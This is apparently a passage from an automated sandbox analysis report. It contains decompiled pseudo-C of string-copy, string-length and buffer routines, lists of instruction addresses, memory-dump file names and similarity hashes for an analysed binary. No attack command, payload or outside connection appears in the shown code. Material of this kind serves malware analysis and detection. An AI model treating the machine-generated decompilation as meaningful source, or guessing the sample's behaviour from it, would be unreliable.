									_v68 = _t398;
									_t284 = _t296;
									while(1) {
										_t284 = _t284 + 1;
										_t414 =  *(_t321 + _t284 * 4 - 2) & 0x0000ffff;
										 *(_t421 + _t284 * 4 - 2) = _t414;
										__eflags = _t414;
										if(_t414 == 0) {
											break;
										}
										_t415 =  *(_t321 + _t284 * 4) & 0x0000ffff;
										 *(_t421 + _t284 * 4) = _t415;
										__eflags = _t415;
										if(_t415 != 0) {
											continue;
										}
										break;
									}
									_t398 = _v68;
									goto L34;
								}
							}
							_t421 = _v40;
							goto L37;
						}
						_t288 = _t417 & 0x0000000f;
						__eflags = _t288;
						if(_t288 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t395 =  ~( ~_t288 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t395;
							while(1) {
								asm("movdqu xmm1, [esi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb ecx, xmm1");
								__eflags = _t312;
								if(_t312 != 0) {
									break;
								}
								_t288 = _t288 + 8;
								__eflags = _t288 - _t395;
								if(_t288 < _t395) {
									continue;
								}
								__eflags = _t395 - 0x7fffffff;
								if(_t395 >= 0x7fffffff) {
									L22:
									_t418 = 0x40;
									_t345 = 0x7fffffff;
									goto L23;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									__eflags =  *(_t417 + _t395 * 2) & 0x0000ffff;
									if(( *(_t417 + _t395 * 2) & 0x0000ffff) == 0) {
										break;
									}
									_t395 = _t395 + 1;
									__eflags = _t395 - 0x7fffffff;
									if(_t395 < 0x7fffffff) {
										continue;
									}
									goto L22;
								}
								L64:
								__eflags = _t345 - 0xfffffffe;
								if(_t345 != 0xfffffffe) {
									_t418 = 0x40;
								} else {
									 *_t417 = _t296;
									_t418 = _v36;
								}
								goto L23;
							}
							asm("bsf edx, ecx");
							_t345 = (_t395 >> 1) + _t288;
							goto L64;
						}
						_t395 = _t296;
						__eflags = _t288 & 0x00000001;
						if((_t288 & 0x00000001) != 0) {
							goto L20;
						}
						_t288 =  ~_t288 + 0x10 >> 1;
						__eflags = _t288;
						while(1) {
							_t312 =  *(_t417 + _t395 * 2) & 0x0000ffff;
							__eflags = _t312;
							if(_t312 == 0) {
								goto L64;
							}
							_t395 = _t395 + 1;
							__eflags = _t395 - _t288;
							if(_t395 < _t288) {
								continue;
							}
							goto L16;
						}
						goto L64;
					}
					_t227 =  &_v40;
					goto L38;
				}
				if(_t417 == 0) {
					L6:
					_push(2);
					_push(_t344);
					E6EA010B0();
					_t447 = _t447 + 8;
					goto L8;
				}
				_t293 =  *_t344 & 0x0000ffff;
				 *_t417 = _t293;
				if(_t293 == 0) {
					goto L6;
				}
				_t294 = 0;
				while(1) {
					_t294 = _t294 + 1;
					_t312 =  *(_t344 + _t294 * 4 - 2) & 0x0000ffff;
					 *(_t417 + _t294 * 4 - 2) = _t312;
					if(_t312 == 0) {
						goto L6;
					}
					_t312 =  *(_t344 + _t294 * 4) & 0x0000ffff;
					 *(_t417 + _t294 * 4) = _t312;
					if(_t312 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x6ea0a660
0x6ea0a66c
0x6ea0a66e
0x6ea0a672
0x6ea0a674
0x6ea0a678
0x6ea0a682
0x6ea0a684
0x6ea0a687
0x6ea0a68d
0x6ea0a6c7
0x6ea0a6ca
0x6ea0a6ce
0x6ea0a6d6
0x6ea0a6dc
0x6ea0a6e7
0x6ea0a6e9
0x6ea0ae6d
0x6ea0ae72
0x6ea0a76d
0x6ea0a772
0x6ea0a772
0x6ea0a775
0x6ea0a778
0x6ea0a77b
0x6ea0a77d
0x6ea0a792
0x6ea0a795
0x6ea0a795
0x6ea0a79a
0x6ea0a7a2
0x6ea0a7a2
0x6ea0a7a2
0x6ea0a7a3
0x6ea0a7aa
0x6ea0a7b4
0x6ea0a7b8
0x6ea0a7b9
0x6ea0a7bd
0x6ea0a7c2
0x6ea0a7c6
0x6ea0a7c8
0x6ea0a7cb
0x6ea0a7cf
0x6ea0a7d1
0x6ea0a819
0x00000000
0x6ea0a7d3
0x6ea0a7d3
0x6ea0a7d5
0x6ea0a804
0x6ea0a804
0x6ea0a806
0x6ea0a807
0x6ea0a80b
0x6ea0a810
0x6ea0a814
0x6ea0a81c
0x6ea0a820
0x6ea0a824
0x6ea0a828
0x6ea0a82c
0x6ea0a830
0x6ea0a836
0x6ea0a83b
0x6ea0a83b
0x6ea0a83d
0x6ea0a842
0x6ea0a84b
0x6ea0a84b
0x6ea0a850
0x6ea0a852
0x6ea0a85a
0x6ea0a85c
0x6ea0a85f
0x6ea0a863
0x6ea0a8a0
0x6ea0a94a
0x6ea0a94a
0x6ea0a94c
0x6ea0a953
0x6ea0a953
0x6ea0a955
0x6ea0a959
0x6ea0a961
0x6ea0a967
0x6ea0a974
0x6ea0a974
0x6ea0a867
0x6ea0a890
0x6ea0a890
0x6ea0a892
0x6ea0a893
0x6ea0a898
0x00000000
0x6ea0a898
0x6ea0a869
0x6ea0a86c
0x6ea0a871
0x00000000
0x00000000
0x6ea0a873
0x6ea0a875
0x6ea0a875
0x6ea0a876
0x6ea0a87b
0x6ea0a882
0x00000000
0x00000000
0x6ea0a884
0x6ea0a888
0x6ea0a88e
0x00000000
0x00000000
0x00000000
0x6ea0a88e
0x00000000
0x6ea0a875
0x6ea0a844
0x6ea0a849
0x6ea0a8a8
0x6ea0a8aa
0x6ea0a8ac
0x6ea0a8f5
0x6ea0a8f5
0x6ea0a8fa
0x6ea0a8fc
0x6ea0a904
0x6ea0a906
0x6ea0a909
0x6ea0a90b
0x6ea0a90d
0x6ea0a947
0x00000000
0x6ea0a947
0x6ea0a90f
0x6ea0a911
0x6ea0a93a
0x6ea0a93a
0x6ea0a93c
0x6ea0a93d
0x6ea0a942
0x00000000
0x6ea0a942
0x6ea0a913
0x6ea0a916
0x6ea0a919
0x6ea0a91b
0x00000000
0x00000000
0x6ea0a91d
0x6ea0a91f
0x6ea0a91f
0x6ea0a920
0x6ea0a925
0x6ea0a92a
0x6ea0a92c
0x00000000
0x00000000
0x6ea0a92e
0x6ea0a932
0x6ea0a936
0x6ea0a938
0x00000000
0x00000000
0x00000000
0x6ea0a938
0x00000000
0x6ea0a91f
0x6ea0a8b1
0x6ea0a8b3
0x00000000
0x00000000
0x6ea0a8b5
0x6ea0a8bc
0x6ea0a8c2
0x6ea0a8c5
0x6ea0a8c7
0x6ea0a8ca
0x6ea0a8ce
0x6ea0a8ce
0x6ea0a8d5
0x6ea0a8db
0x6ea0a8de
0x6ea0a8e1
0x00000000
0x00000000
0x6ea0a8e7
0x6ea0a8ec
0x6ea0a8ee
0x00000000
0x00000000
0x6ea0a8f0
0x6ea0a8f0
0x6ea0a8f3
0x6ea0a8f3
0x00000000
0x6ea0a8f3
0x6ea0a992
0x6ea0a996
0x6ea0a999
0x6ea0a99c
0x6ea0a99e
0x6ea0a9a0
0x00000000
0x00000000
0x6ea0a9a8
0x6ea0a9ab
0x6ea0a9af
0x6ea0a9b7
0x6ea0a9bf
0x6ea0a9c3
0x6ea0a9c7
0x6ea0a9cb
0x6ea0a9cf
0x6ea0a9d3
0x6ea0a9d7
0x6ea0a9e7
0x6ea0a9e7
0x6ea0a9e7
0x6ea0a9e9
0x6ea0a9eb
0x00000000
0x00000000
0x6ea0a9ed
0x6ea0a9ef
0x6ea0a9f1
0x6ea0aa5a
0x6ea0aa5a
0x6ea0aa5e
0x6ea0aa62
0x6ea0aa64
0x00000000
0x00000000
0x6ea0aa6a
0x6ea0aa6b
0x6ea0aa70
0x00000000
0x00000000
0x6ea0aa72
0x6ea0aa7a
0x6ea0aa7a
0x6ea0aa7f
0x6ea0aa7f
0x6ea0aa82
0x6ea0aa82
0x6ea0aa84
0x6ea0aa88
0x6ea0aa8c
0x6ea0aa93
0x6ea0aa99
0x6ea0aa9f
0x6ea0aaa2
0x6ea0aaa8
0x6ea0aaab
0x6ea0aaae
0x00000000
0x00000000
0x6ea0aaba
0x6ea0aabc
0x6ea0aac4
0x6ea0aac4
0x6ea0aac8
0x6ea0aaca
0x6ea0aacd
0x6ea0aacf
0x00000000
0x00000000
0x6ea0aad5
0x6ea0aad5
0x6ea0aad7
0x6ea0aad9
0x6ea0ab3a
0x6ea0ab3a
0x6ea0ab3d
0x6ea0ab5f
0x6ea0ab6b
0x6ea0ab6b
0x6ea0ab71
0x6ea0ab71
0x6ea0ab76
0x6ea0ab7a
0x6ea0ab7e
0x6ea0ab80
0x00000000
0x00000000
0x6ea0ab86
0x6ea0ab89
0x6ea0ab8b
0x00000000
0x00000000
0x6ea0ab8d
0x6ea0ab8f
0x6ea0ab95
0x6ea0aba8
0x6ea0aba8
0x6ea0abad
0x6ea0abb2
0x6ea0abb4
0x6ea0abb6
0x6ea0abb8
0x6ea0abbe
0x6ea0abbe
0x6ea0abc0
0x6ea0abc0
0x6ea0abc2
0x6ea0abc5
0x6ea0abc8
0x6ea0abca
0x6ea0ad2f
0x6ea0ad2f
0x6ea0ad39
0x6ea0ad3b
0x6ea0ad3e
0x6ea0ad40
0x6ea0ad42
0x6ea0ad7f
0x00000000
0x6ea0ad7f
0x6ea0ad44
0x6ea0ad46
0x6ea0ad6f
0x6ea0ad6f
0x6ea0ad71
0x6ea0ad72
0x6ea0ad77
0x00000000
0x6ea0ad77
0x6ea0ad48
0x6ea0ad4b
0x6ea0ad4e
0x6ea0ad50
0x00000000
0x00000000
0x6ea0ad52
0x6ea0ad54
0x6ea0ad54
0x6ea0ad55
0x6ea0ad5a
0x6ea0ad5f
0x6ea0ad61
0x00000000
0x00000000
0x6ea0ad63
0x6ea0ad67
0x6ea0ad6b
0x6ea0ad6d
0x00000000
0x00000000
0x00000000
0x6ea0ad6d
0x00000000
0x6ea0ad54
0x6ea0abd3
0x6ea0abd5
0x00000000
0x00000000
0x6ea0abdb
0x6ea0abdd
0x6ea0ac4d
0x6ea0ac52
0x6ea0ac52
0x6ea0ac55
0x6ea0ac58
0x6ea0ac5b
0x6ea0ac5d
0x6ea0ac70
0x6ea0ac73
0x6ea0ac73
0x6ea0ac79
0x6ea0ac81
0x6ea0ac81
0x6ea0ac81
0x6ea0ac82
0x6ea0ac89
0x6ea0ac93
0x6ea0ac97
0x6ea0ac98
0x6ea0ac9c
0x6ea0aca1
0x6ea0aca5
0x6ea0aca8
0x6ea0acaa
0x6ea0acac
0x6ea0acfc
0x00000000
0x6ea0acae
0x6ea0acae
0x6ea0acb0
0x6ea0acdf
0x6ea0acdf
0x6ea0ace1
0x6ea0ace2
0x6ea0ace6
0x6ea0acea
0x6ea0acef
0x6ea0acf3
0x6ea0acf7
0x6ea0acff
0x6ea0ad03
0x6ea0ad06
0x6ea0ad08
0x6ea0ad08
0x6ea0ad0a
0x00000000
0x00000000
0x6ea0ad10
0x6ea0ad1a
0x6ea0ad1a
0x6ea0ad1d
0x6ea0ad1e
0x6ea0ad21
0x6ea0ad23
0x00000000
0x00000000
0x6ea0ad25
0x6ea0ad27
0x6ea0ad8e
0x6ea0ad90
0x00000000
0x6ea0ad90
0x6ea0ad29
0x6ea0ad29
0x6ea0ad2b
0x6ea0ad99
0x00000000
0x6ea0ad99
0x6ea0ad14
0x6ea0ad17
0x6ea0ad17
0x6ea0ad17
0x6ea0ad1a
0x6ea0acb2
0x6ea0acb5
0x6ea0acb8
0x6ea0acba
0x6ea0acbd
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0acbf
0x6ea0acbf
0x6ea0acbf
0x6ea0acc0
0x6ea0acc5
0x6ea0acca
0x6ea0accc
0x00000000
0x00000000
0x6ea0acce
0x6ea0acd2
0x6ea0acd6
0x6ea0acd8
0x00000000
0x00000000
0x00000000
0x6ea0acd8
0x6ea0acda
0x6ea0acdd
0x6ea0acdd
0x00000000
0x6ea0acdd
0x6ea0acac
0x6ea0ac5f
0x00000000
0x6ea0ac5f
0x6ea0abe1
0x6ea0abe1
0x6ea0abe4
0x6ea0ac01
0x6ea0ac0d
0x6ea0ac0d
0x6ea0ac13
0x6ea0ac13
0x6ea0ac18
0x6ea0ac1c
0x6ea0ac20
0x6ea0ac22
0x00000000
0x00000000
0x6ea0ac28
0x6ea0ac2b
0x6ea0ac2d
0x00000000
0x00000000
0x6ea0ac2f
0x6ea0ac35
0x6ea0ac48
0x6ea0ac48
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0ac37
0x6ea0ac37
0x6ea0ac3b
0x6ea0ac3d
0x00000000
0x00000000
0x6ea0ac3f
0x6ea0ac40
0x6ea0ac46
0x00000000
0x00000000
0x00000000
0x6ea0ac46
0x00000000
0x6ea0ac37
0x6ea0adbf
0x6ea0adc4
0x00000000
0x6ea0adc4
0x6ea0abe6
0x6ea0abe8
0x6ea0abeb
0x00000000
0x00000000
0x6ea0abf2
0x6ea0abf2
0x6ea0abf4
0x6ea0abf4
0x6ea0abf8
0x6ea0abfa
0x00000000
0x00000000
0x6ea0abfc
0x6ea0abfd
0x6ea0abff
0x00000000
0x00000000
0x00000000
0x6ea0abff
0x00000000
0x6ea0abf4
0x6ea0abba
0x6ea0abbc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0ab97
0x6ea0ab97
0x6ea0ab9b
0x6ea0ab9d
0x00000000
0x00000000
0x6ea0ab9f
0x6ea0aba0
0x6ea0aba6
0x00000000
0x00000000
0x00000000
0x6ea0aba6
0x00000000
0x6ea0ab97
0x6ea0adcb
0x6ea0adcd
0x6ea0adcf
0x6ea0add4
0x00000000
0x6ea0add4
0x6ea0ab3f
0x6ea0ab41
0x6ea0ab43
0x00000000
0x00000000
0x6ea0ab4a
0x6ea0ab4a
0x6ea0ab4c
0x6ea0ab50
0x6ea0ab52
0x00000000
0x00000000
0x6ea0ab58
0x6ea0ab59
0x6ea0ab5b
0x00000000
0x00000000
0x6ea0ab5d
0x6ea0ab5d
0x00000000
0x6ea0ab5d
0x6ea0ad87
0x00000000
0x6ea0ad87
0x6ea0aadb
0x6ea0aae0
0x6ea0aae2
0x6ea0aaea
0x6ea0aaec
0x6ea0aaef
0x6ea0aaf1
0x6ea0aaf3
0x6ea0ab30
0x00000000
0x6ea0ab30
0x6ea0aaf5
0x6ea0aaf7
0x6ea0ab20
0x6ea0ab20
0x6ea0ab22
0x6ea0ab23
0x6ea0ab28
0x00000000
0x6ea0ab28
0x6ea0aaf9
0x6ea0aafc
0x6ea0aaff
0x6ea0ab01
0x00000000
0x00000000
0x6ea0ab03
0x6ea0ab05
0x6ea0ab05
0x6ea0ab06
0x6ea0ab0b
0x6ea0ab10
0x6ea0ab12
0x00000000
0x00000000
0x6ea0ab14
0x6ea0ab18
0x6ea0ab1c
0x6ea0ab1e
0x00000000
0x00000000
0x00000000
0x6ea0ab1e
0x00000000
0x6ea0ab05
0x6ea0aabe
0x6ea0aabf
0x6ea0aac2
0x00000000
0x00000000
0x00000000
0x6ea0aac2
0x6ea0ade9
0x6ea0ade9
0x6ea0adec
0x00000000
0x00000000
0x6ea0adf6
0x6ea0adf8
0x00000000
0x00000000
0x6ea0adfe
0x6ea0ae02
0x6ea0ae02
0x6ea0ae04
0x6ea0ae04
0x6ea0ae0e
0x6ea0ae11
0x6ea0ae17
0x6ea0ae21
0x6ea0ae24
0x6ea0ae27
0x00000000
0x00000000
0x6ea0ae31
0x6ea0ae33
0x00000000
0x00000000
0x00000000
0x6ea0ae35
0x6ea0a9db
0x6ea0a9df
0x6ea0a9e3
0x00000000
0x6ea0a9e3
0x6ea0ae3a
0x6ea0adac
0x6ea0adac
0x6ea0adae
0x00000000
0x00000000
0x6ea0adb4
0x00000000
0x00000000
0x00000000
0x6ea0adba
0x6ea0a9f3
0x6ea0a9f7
0x6ea0a9f9
0x6ea0a9fd
0x6ea0a9ff
0x00000000
0x00000000
0x6ea0aa05
0x6ea0aa06
0x6ea0aa08
0x00000000
0x00000000
0x6ea0aa0a
0x6ea0aa12
0x00000000
0x6ea0aa12
0x6ea0ada0
0x00000000
0x6ea0aa16
0x6ea0aa22
0x6ea0aa26
0x6ea0aa26
0x6ea0aa2b
0x6ea0aa2b
0x6ea0aa30
0x6ea0aa34
0x6ea0aa38
0x6ea0aa3a
0x00000000
0x00000000
0x6ea0aa40
0x6ea0aa43
0x6ea0aa45
0x00000000
0x00000000
0x6ea0aa47
0x6ea0aa53
0x6ea0aa58
0x00000000
0x00000000
0x00000000
0x6ea0aa58
0x6ea0ae49
0x6ea0ae4e
0x6ea0ae52
0x00000000
0x6ea0ae58
0x6ea0a9e7
0x00000000
0x6ea0a849
0x6ea0a7d7
0x6ea0a7da
0x6ea0a7dd
0x6ea0a7df
0x00000000
0x00000000
0x6ea0a7e1
0x6ea0a7e4
0x6ea0a7e6
0x6ea0a7e6
0x6ea0a7e7
0x6ea0a7ec
0x6ea0a7f1
0x6ea0a7f3
0x00000000
0x00000000
0x6ea0a7f5
0x6ea0a7f9
0x6ea0a7fd
0x6ea0a7ff
0x00000000
0x00000000
0x00000000
0x6ea0a7ff
0x6ea0a801
0x00000000
0x6ea0a801
0x6ea0a7d1
0x6ea0a77f
0x00000000
0x6ea0a77f
0x6ea0a6f1
0x6ea0a6f1
0x6ea0a6f4
0x6ea0a714
0x6ea0a718
0x6ea0a724
0x6ea0a724
0x6ea0a72a
0x6ea0a72a
0x6ea0a72f
0x6ea0a733
0x6ea0a737
0x6ea0a739
0x00000000
0x00000000
0x6ea0a73f
0x6ea0a742
0x6ea0a744
0x00000000
0x00000000
0x6ea0a746
0x6ea0a74c
0x6ea0a763
0x6ea0a763
0x6ea0a768
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0a74e
0x6ea0a74e
0x6ea0a752
0x6ea0a754
0x00000000
0x00000000
0x6ea0a75a
0x6ea0a75b
0x6ea0a761
0x00000000
0x00000000
0x00000000
0x6ea0a761
0x6ea0a977
0x6ea0a977
0x6ea0a97a
0x6ea0a988
0x6ea0a97c
0x6ea0a97c
0x6ea0a97f
0x6ea0a97f
0x00000000
0x6ea0a97a
0x6ea0ae61
0x6ea0ae66
0x00000000
0x6ea0ae66
0x6ea0a6f6
0x6ea0a6f8
0x6ea0a6fa
0x00000000
0x00000000
0x6ea0a701
0x6ea0a701
0x6ea0a703
0x6ea0a703
0x6ea0a707
0x6ea0a709
0x00000000
0x00000000
0x6ea0a70f
0x6ea0a710
0x6ea0a712
0x00000000
0x00000000
0x00000000
0x6ea0a712
0x00000000
0x6ea0a703
0x6ea0a6de
0x00000000
0x6ea0a6de
0x6ea0a691
0x6ea0a6ba
0x6ea0a6ba
0x6ea0a6bc
0x6ea0a6bd
0x6ea0a6c2
0x00000000
0x6ea0a6c2
0x6ea0a693
0x6ea0a696
0x6ea0a69b
0x00000000
0x00000000
0x6ea0a69d
0x6ea0a69f
0x6ea0a69f
0x6ea0a6a0
0x6ea0a6a5
0x6ea0a6ac
0x00000000
0x00000000
0x6ea0a6ae
0x6ea0a6b2
0x6ea0a6b8
0x00000000
0x00000000
0x00000000
0x6ea0a6b8
0x00000000

Strings

@, xrefs: 6EA0A6CE

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ae6b3e210800e4c3dadabf5ebb6fe57ad04fee7b8c08fcbeb00b4035cedc0044
Instruction ID: 61c9d4b0ea825ad006f100d932befa1c1a051f65089ca7c8a8acc558b91b6da0
Opcode Fuzzy Hash: ae6b3e210800e4c3dadabf5ebb6fe57ad04fee7b8c08fcbeb00b4035cedc0044
Instruction Fuzzy Hash: 9F322571A147138BD3548FA9D46022A73F3BFC4758F29862DE8A58B384EB35DC86C349

Uniqueness

Uniqueness Score: -1.00%

Function 6EA11EB0, Relevance: 1.9, Strings: 1, Instructions: 682
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E6EA11EB0(intOrPtr* __ecx, void* __eflags, signed int* _a4, char _a8) {
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char* _t210;
				signed int _t211;
				signed int* _t217;
				char* _t221;
				signed int* _t222;
				intOrPtr _t227;
				signed int _t232;
				signed int _t235;
				signed int _t239;
				signed int _t241;
				signed int* _t247;
				signed int _t248;
				signed int _t250;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t265;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				char _t276;
				signed int _t278;
				signed int _t279;
				signed int _t282;
				signed int _t283;
				intOrPtr* _t286;
				signed int _t287;
				signed int _t291;
				signed int _t293;
				signed int _t294;
				void* _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t303;
				char _t304;
				char _t305;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				void* _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				intOrPtr* _t325;
				char _t326;
				signed int _t327;
				intOrPtr* _t329;
				signed int _t330;
				signed int _t331;
				void* _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				void* _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				void* _t343;
				intOrPtr* _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				char _t357;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				char _t368;
				char _t369;
				char _t370;
				signed int _t372;
				unsigned int _t377;
				signed int _t379;
				intOrPtr _t381;
				signed int _t385;
				signed int _t386;
				signed char* _t392;
				signed int _t393;
				signed int _t395;
				signed int _t401;
				signed int _t402;
				unsigned int _t408;
				signed int _t410;
				void* _t411;
				signed int _t417;
				signed int _t421;
				signed int _t427;
				signed int _t428;
				void* _t431;

				_v56 = 0;
				_t286 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t372 = E6EA01030();
				_t431 = (_t428 & 0xfffffff0) - 0x34 + 4;
				_t210 = _v56;
				if(_t210 == 0) {
					 *_t372 = 0;
				} else {
					if(_t372 != 0) {
						_t368 =  *_t210;
						 *_t372 = _t368;
						if(_t368 != 0) {
							_t319 = 0;
							while(1) {
								_t319 = _t319 + 1;
								_t369 =  *((char*)(_t210 + _t319 * 2 - 1));
								 *((char*)(_t372 + _t319 * 2 - 1)) = _t369;
								if(_t369 == 0) {
									goto L6;
								}
								_t370 =  *((char*)(_t210 + _t319 * 2));
								 *((char*)(_t372 + _t319 * 2)) = _t370;
								if(_t370 != 0) {
									continue;
								}
								goto L6;
							}
						}
					}
					L6:
					_push(1);
					_push(_t210);
					E6EA010B0();
					_t431 = _t431 + 8;
				}
				_t211 = _a8;
				_v52 = 0x40;
				_v56 = _t372;
				if(_t211 != 0) {
					__eflags = _t372;
					if(_t372 == 0) {
						_t302 = 0x40;
						_t401 = 0;
					} else {
						_t366 = _t372 & 0x0000000f;
						__eflags = _t366;
						if(_t366 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t427 =  ~( ~_t366 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t427;
							while(1) {
								asm("movdqu xmm1, [edi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t211;
								if(_t211 != 0) {
									break;
								}
								_t366 = _t366 + 0x10;
								__eflags = _t366 - _t427;
								if(_t366 < _t427) {
									continue;
								} else {
									__eflags = _t427 - 0x7fffffff;
									if(_t427 >= 0x7fffffff) {
										L21:
										_t302 = 0x40;
										_t401 = 0x7fffffff;
									} else {
										while(1) {
											__eflags =  *((char*)(_t427 + _t372));
											if( *((char*)(_t427 + _t372)) == 0) {
												goto L174;
											}
											_t427 = _t427 + 1;
											__eflags = _t427 - 0x7fffffff;
											if(_t427 < 0x7fffffff) {
												continue;
											} else {
												goto L21;
											}
											goto L22;
										}
										goto L174;
									}
								}
								goto L22;
							}
							asm("bsf esi, eax");
							_t401 = _t427 + _t366;
							goto L174;
						} else {
							_t401 = 0;
							_t366 =  ~_t366 + 0x10;
							__eflags = _t366;
							while(1) {
								__eflags =  *((char*)(_t401 + _t372));
								if( *((char*)(_t401 + _t372)) == 0) {
									break;
								}
								_t401 = _t401 + 1;
								__eflags = _t401 - _t366;
								if(_t401 < _t366) {
									continue;
								} else {
									goto L15;
								}
								goto L22;
							}
							L174:
							__eflags = _t401 - 0xfffffffe;
							if(_t401 != 0xfffffffe) {
								_t302 = 0x40;
							} else {
								 *_t372 = 0;
								_t302 = _v52;
							}
						}
					}
					L22:
					_t20 = _t401 + 2; // 0x80000001
					_t320 = _t20;
					__eflags = _t320 - 0x40;
					_t321 =  <=  ? 0x40 : _t320;
					__eflags = _t302 - _t321;
					if(_t302 < _t321) {
						_t377 = (_t321 >> 5 >> 0x1a) + _t321 >> 6;
						_t322 = _t321 & 0x8000003f;
						__eflags = _t322;
						if(_t322 < 0) {
							_t322 = (_t322 - 0x00000001 | 0xffffffc0) + 1;
							__eflags = _t322;
						}
						__eflags = _t322;
						_t379 = _t377 + (0 | _t322 > 0x00000000) << 6;
						_push(_t379);
						_t303 = E6EA01030();
						_t431 = _t431 + 4;
						_t323 = _v56;
						__eflags = _t323;
						if(_t323 == 0) {
							 *_t303 = 0;
						} else {
							__eflags = _t303;
							if(_t303 != 0) {
								_t282 =  *_t323;
								 *_t303 = _t282;
								__eflags = _t282;
								if(_t282 != 0) {
									_v60 = _t379;
									_t283 = 0;
									__eflags = 0;
									_v64 = _t401;
									_v68 = _t286;
									while(1) {
										_t283 = _t283 + 1;
										_t299 =  *((char*)(_t323 + _t283 * 2 - 1));
										 *(_t303 + _t283 * 2 - 1) = _t299;
										__eflags = _t299;
										if(_t299 == 0) {
											break;
										}
										_t300 =  *((char*)(_t323 + _t283 * 2));
										 *(_t303 + _t283 * 2) = _t300;
										__eflags = _t300;
										if(_t300 != 0) {
											continue;
										}
										break;
									}
									_t379 = _v60;
									_t401 = _v64;
									_t286 = _v68;
								}
							}
							_push(1);
							_push(_t323);
							_v68 = _t303;
							E6EA010B0();
							_t303 = _v68;
							_t431 = _t431 + 8;
						}
						_v52 = _t379;
						_v56 = _t303;
					} else {
						_t303 = _v56;
					}
					 *((char*)(_t303 + _t401)) = _a8;
					_t217 =  &_v56;
					 *((char*)(_t401 +  *_t217 + 1)) = 0;
				} else {
					_t217 =  &_v56;
				}
				_t402 =  *_t217;
				if(_t402 == 0) {
					L39:
					_t325 = _a4;
					_push(0x40);
					 *_t325 = 0;
					 *((intOrPtr*)(_t325 + 4)) = 0;
					_t287 = E6EA01030();
					_t431 = _t431 + 4;
					_t221 =  *_a4;
					if(_t221 == 0) {
						 *_t287 = 0;
					} else {
						if(_t287 != 0) {
							_t326 =  *_t221;
							 *_t287 = _t326;
							if(_t326 != 0) {
								_t327 = 0;
								while(1) {
									_t327 = _t327 + 1;
									_t304 =  *((char*)(_t221 + _t327 * 2 - 1));
									 *((char*)(_t287 + _t327 * 2 - 1)) = _t304;
									if(_t304 == 0) {
										goto L45;
									}
									_t305 =  *((char*)(_t221 + _t327 * 2));
									 *((char*)(_t287 + _t327 * 2)) = _t305;
									if(_t305 != 0) {
										continue;
									}
									goto L45;
								}
							}
						}
						L45:
						_push(1);
						_push(_t221);
						E6EA010B0();
						_t431 = _t431 + 8;
					}
					goto L124;
				} else {
					_t227 =  *_t402;
					_v40 = _t227;
					if(_t227 != 0) {
						_v64 =  *_t286;
						_t307 = E6EA15A90( *_t286, _t402);
						__eflags = _t307;
						if(_t307 == 0) {
							_t329 = _a4;
							_push(0x40);
							 *_t329 = 0;
							 *((intOrPtr*)(_t329 + 4)) = 0;
							_t287 = E6EA01030();
							_t431 = _t431 + 4;
							_t232 =  *_a4;
							__eflags = _t232;
							if(_t232 == 0) {
								 *_t287 = 0;
							} else {
								__eflags = _t287;
								if(_t287 != 0) {
									_t330 =  *_t232;
									 *_t287 = _t330;
									__eflags = _t330;
									if(_t330 != 0) {
										_t331 = 0;
										__eflags = 0;
										while(1) {
											_t331 = _t331 + 1;
											_t308 =  *((char*)(_t232 + _t331 * 2 - 1));
											 *(_t287 + _t331 * 2 - 1) = _t308;
											__eflags = _t308;
											if(_t308 == 0) {
												goto L172;
											}
											_t309 =  *((char*)(_t232 + _t331 * 2));
											 *(_t287 + _t331 * 2) = _t309;
											__eflags = _t309;
											if(_t309 != 0) {
												continue;
											}
											goto L172;
										}
									}
								}
								L172:
								_push(1);
								_push(_t232);
								E6EA010B0();
								_t431 = _t431 + 8;
							}
							goto L124;
						} else {
							_t381 = _v40;
							_t235 = _t402 & 0x0000000f;
							_v36 = _t235;
							asm("pxor xmm0, xmm0");
							_v20 = _t402;
							_v44 = _t381 - 0x41;
							_v24 =  ~_t235 + 0x10;
							_v48 = _t381 + 0x20;
							_t333 = 0;
							__eflags = 0;
							while(1) {
								L49:
								_t385 = _t307;
								_t291 = _t307 + 1;
								__eflags = _t291;
								if(_t291 == 0) {
									break;
								}
								__eflags =  *(_t307 + 1);
								if( *(_t307 + 1) != 0) {
									__eflags = _v44 - 0x19;
									_t411 = _t333;
									_t268 =  <=  ? _v48 : _v40;
